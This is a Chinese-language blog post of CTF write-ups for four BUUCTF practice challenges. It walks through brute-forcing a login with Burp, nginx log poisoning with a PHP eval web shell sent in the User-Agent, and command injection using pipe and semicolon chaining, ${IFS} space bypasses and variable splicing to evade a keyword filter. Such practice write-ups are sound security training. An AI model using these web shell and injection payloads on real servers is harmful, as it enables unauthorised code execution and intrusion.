BUUCTF靶機筆記

f0r9發表於2024-03-11

BUU BRUTE 1 1

啟動靶機後 可以看到 是一個登陸頁面
image
檢視原始碼:image
沒有有用的資訊 只是單純的html頁面
隨便填一個
使用者:admin
密碼:123
提示密碼為四位
懷疑是暴力破解
使用burp進行單點爆破
image
payload設定
image
暴力完成 檢視length不同的資料包
image
返回flag:
flag{6982d5b6-a2f8-48d8-aec6-9b27417de3eb}

[ACTF2020 新生賽]Include 1

頁面:
image
原始碼:
image
沒有有效資訊 點開a標籤
image
像是檔案包含 隨意構造一個payload
image
可以看到是nginx的伺服器 嘗試包含伺服器日誌檔案
/var/log/nginx/access.log
發現:image
包含成功
嘗試將後門寫在ua中傳入
<?php eval($_POST['1'])?>
image
連結成功
image
得到flag
flag{5d17f6d6-77c5-4973-bb2b-35c090665c32}

[ACTF2020 新生賽]Exec1

image
可執行命令 懷疑是 命令執行bug
image
可以使用管道符與grep過濾 作業系統應該是Linux
利用分號隔開各命令
image
看到一個index.php
image
該頁面為當前頁面
構造payload查詢檔案
127.0.0.1+%7C+grep+seq%3D8+%3B+find / -name "flag.*"
image

伺服器超時

只能對目錄進行遍歷了
image

發現flag在根目錄下
image

得到flag

[GXYCTF2019]Ping Ping Ping

image

毫無頭緒
抓包檢視 沒有有效資訊
頁面給出的字元像是get請求 嘗試get

image

是命令執行

image

過濾空格 可以用 <代替

image

符號也不行
在Linux下存在環境變數:${IFS}可以進行空格繞過 但有符號 可以直接寫$IFS$1

image

ls檢視 發現flag.php
檢視flag.php發現存在過濾
檢視index:

image
發現過濾規則
並且發現最終列印出來的是a 直接傳遞值g給a
image
輸出值a發現是g 嘗試利用a繞過
正則匹配 fla$a
imageimage

測試後 變數a的值可以是l或者g
進行繞過
image
得到flag

相關文章